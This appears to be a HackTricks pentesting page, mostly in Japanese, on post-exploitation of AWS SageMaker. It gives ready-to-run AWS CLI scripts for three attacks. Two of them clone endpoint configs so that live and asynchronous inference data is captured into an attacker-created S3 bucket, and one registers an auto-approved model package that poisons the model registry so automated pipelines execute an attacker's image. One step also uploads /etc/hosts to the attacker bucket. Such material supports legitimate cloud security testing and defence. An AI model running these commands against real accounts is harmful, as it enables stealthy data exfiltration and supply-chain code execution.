hacktricks-cloud/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md

AWS - SageMaker Post-Exploitation

{{#include ../../../../banners/hacktricks-training.md}}

SageMaker endpoint data siphon via UpdateEndpoint DataCaptureConfig

SageMaker のエンドポイント管理を悪用して、モデルやコンテナに触れずにリクエスト/レスポンスを攻撃者管理の S3 バケットへ完全にキャプチャ可能にする手法。zero/low‑downtime のローリングアップデートを使用し、必要なのはエンドポイント管理の権限のみ。

Requirements

• IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
• S3: s3:CreateBucket (または同一アカウント内の既存バケットを使用)
• Optional (if using SSE‑KMS): kms:Encrypt on the chosen CMK
• Target: 同一アカウント/リージョン内の既存の InService real‑time endpoint

Steps

1. InService エンドポイントを特定し、現在の production variants を収集する

REGION=${REGION:-us-east-1}
EP=$(aws sagemaker list-endpoints --region $REGION --query "Endpoints[?EndpointStatus=='InService']|[0].EndpointName" --output text)
echo "Endpoint=$EP"
CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text)
echo "EndpointConfig=$CFG"
aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CFG" --query ProductionVariants > /tmp/pv.json

2. キャプチャ用の attacker S3 宛先を準備する

ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-capture-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION

3. 既存のvariantsを保持しつつ、DataCaptureを攻撃者のバケットに有効化する新しいEndpointConfigを作成する

注意: CLIの検証を満たす明示的なcontent typesを使用すること。

NEWCFG=${CFG}-dc
cat > /tmp/dc.json << JSON
{
"EnableCapture": true,
"InitialSamplingPercentage": 100,
"DestinationS3Uri": "s3://$BUCKET/capture",
"CaptureOptions": [
{"CaptureMode": "Input"},
{"CaptureMode": "Output"}
],
"CaptureContentTypeHeader": {
"JsonContentTypes": ["application/json"],
"CsvContentTypes": ["text/csv"]
}
}
JSON
aws sagemaker create-endpoint-config \
--region $REGION \
--endpoint-config-name "$NEWCFG" \
--production-variants file:///tmp/pv.json \
--data-capture-config file:///tmp/dc.json

4. 新しいconfigをローリングアップデートで適用する（ダウンタイム最小/なし）

aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"

5. 少なくとも1回の推論呼び出しを生成する（ライブトラフィックが存在する場合は任意）

echo '{"inputs":[1,2,3]}' > /tmp/payload.json
aws sagemaker-runtime invoke-endpoint --region $REGION --endpoint-name "$EP" \
--content-type application/json --accept application/json \
--body fileb:///tmp/payload.json /tmp/out.bin || true

6. attacker S3 にある captures を検証する

aws s3 ls s3://$BUCKET/capture/ --recursive --human-readable --summarize

影響

• 対象 endpoint から攻撃者が管理する S3 バケットへ、リアルタイムの推論リクエストおよびレスポンスのペイロード（およびメタデータ）を完全に持ち出す。
• model/container image には変更を加えず、endpoint レベルの変更のみで、運用への影響を最小限に抑えたステルスなデータ盗難経路を実現する。

SageMaker 非同期推論出力のハイジャック（UpdateEndpoint AsyncInferenceConfig を介して）

現在の EndpointConfig をクローンし、AsyncInferenceConfig.OutputConfig の S3OutputPath/S3FailurePath を設定することで、endpoint 管理を悪用し、非同期推論の出力を攻撃者管理の S3 バケットへリダイレクトします。これにより model/container を変更せずに、モデルの予測結果（およびコンテナによって含まれる変換済み入力）を持ち出すことができます。

要件

• IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
• S3: 攻撃者が管理する S3 バケットに書き込む能力（モデル実行ロールまたは許容的なバケットポリシー経由）
• Target: 非同期呼び出しが行われている（または行われる予定の）InService endpoint

手順

1. ターゲット endpoint から現在の ProductionVariants を収集する

REGION=${REGION:-us-east-1}
EP=<target-endpoint-name>
CUR_CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text)
aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CUR_CFG" --query ProductionVariants > /tmp/pv.json

2. attacker bucket を作成する（model execution role がそれに PutObject できることを確認する）

ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-async-exfil-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION || true

3. Clone EndpointConfig を行い、AsyncInference outputs を attacker bucket に hijack する

NEWCFG=${CUR_CFG}-async-exfil
cat > /tmp/async_cfg.json << JSON
{"OutputConfig": {"S3OutputPath": "s3://$BUCKET/async-out/", "S3FailurePath": "s3://$BUCKET/async-fail/"}}
JSON
aws sagemaker create-endpoint-config --region $REGION   --endpoint-config-name "$NEWCFG"   --production-variants file:///tmp/pv.json   --async-inference-config file:///tmp/async_cfg.json
aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"

4. async invocation をトリガーし、オブジェクトが攻撃者の S3 バケットに格納されることを確認する

aws s3 cp /etc/hosts s3://$BUCKET/inp.bin
aws sagemaker-runtime invoke-endpoint-async --region $REGION --endpoint-name "$EP" --input-location s3://$BUCKET/inp.bin >/tmp/async.json || true
sleep 30
aws s3 ls s3://$BUCKET/async-out/ --recursive || true
aws s3 ls s3://$BUCKET/async-fail/ --recursive || true

影響

• 非同期推論の結果（およびエラーボディ）を攻撃者が管理する S3 にリダイレクトし、モデルのコードやイメージを変更せず、ダウンタイムを最小限に抑えながら、コンテナが生成する予測結果や前処理/後処理された可能性のある機密入力を秘密裏に持ち出すことを可能にします。

SageMaker Model Registry supply-chain injection via CreateModelPackage(Approved)

If an attacker can CreateModelPackage on a target SageMaker Model Package Group, they can register a new model version that points to an attacker-controlled container image and immediately mark it Approved. Many CI/CD pipelines auto-deploy Approved model versions to endpoints or training jobs, resulting in attacker code execution under the service’s execution roles. Cross-account exposure can be amplified by a permissive ModelPackageGroup resource policy.

要件

• IAM（既存グループを汚染するための最小権限）: sagemaker:CreateModelPackage を対象の ModelPackageGroup に対して
• オプション（グループが存在しない場合に作成するため）: sagemaker:CreateModelPackageGroup
• S3: 参照される ModelDataUrl への読み取りアクセス（または攻撃者管理のアーティファクトをホスト）
• 対象: 下流の自動化が Approved バージョンを監視している Model Package Group

手順

1. リージョンを設定し、ターゲットの Model Package Group を作成または検索する

REGION=${REGION:-us-east-1}
MPG=victim-group-$(date +%s)
aws sagemaker create-model-package-group --region $REGION --model-package-group-name $MPG --model-package-group-description "test group"

2. S3 にダミーのモデルデータを準備する

ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-mpkg-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION
head -c 1024 </dev/urandom > /tmp/model.tar.gz
aws s3 cp /tmp/model.tar.gz s3://$BUCKET/model/model.tar.gz --region $REGION

3. 公開された AWS DLC イメージを参照する悪意のある（ここでは無害な）Approved model package version を登録する

IMG="683313688378.dkr.ecr.$REGION.amazonaws.com/sagemaker-scikit-learn:1.2-1-cpu-py3"
cat > /tmp/inf.json << JSON
{
"Containers": [
{
"Image": "$IMG",
"ModelDataUrl": "s3://$BUCKET/model/model.tar.gz"
}
],
"SupportedContentTypes": ["text/csv"],
"SupportedResponseMIMETypes": ["text/csv"]
}
JSON
aws sagemaker create-model-package --region $REGION   --model-package-group-name $MPG   --model-approval-status Approved   --inference-specification file:///tmp/inf.json

4. 新しい Approved バージョンが存在することを確認する

aws sagemaker list-model-packages --region $REGION --model-package-group-name $MPG --output table

影響

• 攻撃者が制御するコードを参照する承認済みバージョンでモデルレジストリを汚染します。承認済みモデルを自動デプロイするパイプラインは攻撃者のイメージをプルして実行する可能性があり、エンドポイント／トレーニングのロールでコード実行が発生します。
• 許容的な ModelPackageGroup のリソースポリシー (PutModelPackageGroupPolicy) がある場合、この悪用はクロスアカウントで発生する可能性があります。

Feature store の汚染

OnlineStore が有効な Feature Group に対して sagemaker:PutRecord を悪用し、オンライン推論で使用されるライブの特徴量を上書きします。sagemaker:GetRecord と組み合わせることで、攻撃者は機密性の高い特徴量を読み取ることができます。これにはモデルやエンドポイントへのアクセスは不要です。

{{#ref}} feature-store-poisoning.md {{/ref}} {{#include ../../../../banners/hacktricks-training.md}}